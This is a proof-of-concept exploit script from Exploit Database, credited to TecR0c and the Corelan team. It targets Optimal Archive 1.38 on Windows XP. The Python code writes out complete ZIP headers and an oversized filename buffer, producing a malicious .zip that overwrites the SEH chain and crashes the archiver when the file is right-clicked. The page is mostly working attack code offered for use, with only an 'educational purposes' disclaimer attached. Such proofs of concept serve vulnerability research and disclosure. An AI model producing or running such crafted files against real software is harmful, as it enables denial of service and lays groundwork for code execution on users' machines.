Optimal Archive 1.38 – ‘.zip’ File (SEH) (PoC)

• Exploit Database
• 10 阅读

• 作者： TecR0c
  日期： 2010-03-31
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/11984/

• #!/usr/bin/python
  # #######################################################################
  # Title:Optimal Archive 1.38 (.zip) 0day SEH PoC
  # Author: TecR0c - http://tecninja.net/blog & http://twitter.com/TecR0c
  # Found by: TecR0c
  # Download: http://www.optimalaccess.com/oadownload.php?version=oarchive.exe
  # Platform: Windows XP sp3 En
  # Advisory: http://www.corelan.be:8800/advisories.php?id=CORELAN-10-017
  # Greetz to:Corelan Security Team
  # http://www.corelan.be:8800/index.php/security/corelan-team-members/
  # #######################################################################
  # Script provided 'as is', without any warranty.
  # Use for educational purposes only.
  # Do not use this code to do anything illegal !
  #
  # Note : you are not allowed to edit/modify this code.
  # If you do, Corelan cannot be held responsible for any damages this may cause.
  
  # Trigger : Right click on specially crafzip file > Boom
  # Very strange behavior when debugging
  
  print "|------------------------------------------------------------------|"
  print "| __ __|"
  print "| _________________/ /___ _____ / /________ _____ ___|"
  print "|/ ___/ __ \/ ___/ _ \/ / __ `/ __ \ / __/ _ \/ __ `/ __ `__ \ |"
  print "| / /__/ /_/ / //__/ / /_/ / / / // /_/__/ /_/ / / / / / / |"
  print "| \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/ /_/|"
  print "||"
  print "| http://www.corelan.be:8800 |"
  print "|security@corelan.be |"
  print "||"
  print "|-------------------------------------------------[ EIP Hunters ]--|"
  print "[+] optimal (.zip)- by TecR0c"
  
  
  ldf_header = ("\x50\x4B\x03\x04\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00"
  "\x00\x00\x00\x00\x00\x00\x00\x00"
  "\xe4\x0f"
  "\x00\x00\x00")
  
  cdf_header = ("\x50\x4B\x01\x02\x14\x00\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00"
  "\x00\x00\x00\x00\x00\x00\x00\x00\x00"
  "\xe4\x0f"
  "\x00\x00\x00\x00\x00\x00\x01\x00"
  "\x24\x00\x00\x00\x00\x00\x00\x00")
  
  eofcdf_header = ("\x50\x4B\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00"
  "\x12\x10\x00\x00"
  "\x02\x10\x00\x00"
  "\x00\x00")
  
  buff = "\x42" * 2340
  buff += "\x44" * 4
  buff += "\x42" * (4064-len(buff))
  buff += ".txt"
  
  mefile = open('optimal.zip','w');
  mefile.write(ldf_header + buff + cdf_header + buff + eofcdf_header);
  mefile.close()